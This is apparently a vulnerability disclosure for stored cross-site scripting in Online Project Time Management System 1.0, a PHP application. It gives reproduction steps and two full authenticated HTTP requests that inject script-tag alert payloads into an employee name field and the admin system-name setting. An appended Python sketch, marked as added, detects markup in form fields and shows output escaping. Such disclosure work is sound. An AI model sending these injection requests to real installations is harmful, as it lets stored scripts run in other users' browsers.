Online Project Time Management System 1.0 - Multiple Stored Cross-Site Scripting (XSS) (Authenticated)


Discovered: 2022-01-25 | Type: webapps | Platform: php

# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Description: Stored XSS in multiple fields...

# Steps to reproduce (with employee access)

# Log in as an employee
# Go to: http://localhost/ptms/?page=user
# Add an XSS payload to any field of the user's name
# Click Update


=================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1339
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="code"

2022-0003
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="generated_password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="firstname"

Mark
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="middlename"

<script>alert("XSS_TEST")</script>
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="lastname"

Cooper
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="department"

IT Department
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="position"

Department Manager
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="email"

mcooper@sample.com
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryvsLkAfaBC64Uzoak--
=================

-----------------------------------------------------------------------------

# Steps to reproduce (with admin access)

# Log in to the admin panel
# Go to: http://localhost/ptms/admin/?page=system_info
# Add an XSS payload to the 'System Name' field
# Click Update


=================

POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 603
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
Origin: http://localhost
Referer: http://localhost/ptms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="name"

Online Project Time Management System - PHP <script>alert("XSS")</script>
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="short_name"

PTMS - PHP
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq--

=================
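
Added example (not part of the original advisory or the application's code): a Python sketch that parses a multipart/form-data body like the two requests above, flags text fields carrying HTML markup, and shows the output encoding that keeps a stored value inert when it is rendered. The boundary, the shortened sample body and the render_full_name helper are constructed for illustration; the application's real rendering code is not shown on this page.

```python
import html
import re
from email import message_from_bytes

# Constructed sample mirroring the save_employee request (shortened; boundary is made up).
BOUNDARY = "----ExampleBoundary"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE_FIELDS = [("firstname", "Mark"),
                 ("middlename", '<script>alert("XSS_TEST")</script>'),
                 ("lastname", "Cooper")]
SAMPLE_BODY = "".join(
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
    for k, v in SAMPLE_FIELDS
).encode() + f"--{BOUNDARY}--\r\n".encode()

# Heuristic only: start of an element, closing tag, comment or doctype.
MARKUP = re.compile(r"<\s*[a-zA-Z/!]")

def parse_form_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: text value}."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    fields = {}
    if not msg.is_multipart():
        return fields
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if name is None or part.get_filename() is not None:
            continue  # skip malformed parts and file uploads (img, cover)
        data = part.get_payload(decode=True) or b""
        fields[name] = data.decode("utf-8", "replace").strip()
    return fields

def find_markup_fields(fields: dict) -> list:
    """Names of fields whose value looks like HTML markup (for logging/alerting)."""
    return sorted(n for n, v in fields.items() if MARKUP.search(v))

def render_full_name(fields: dict) -> str:
    """Hypothetical view helper: encode every stored value at output time."""
    parts = (fields.get(k, "") for k in ("firstname", "middlename", "lastname"))
    return "<td>" + " ".join(html.escape(p, quote=True) for p in parts if p) + "</td>"

if __name__ == "__main__":
    parsed = parse_form_fields(CONTENT_TYPE, SAMPLE_BODY)
    print(find_markup_fields(parsed))
    print(render_full_name(parsed))
```

The markup check is a detection aid for request logs; the fix for stored XSS is the encoding step, applied wherever the value is written into HTML.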
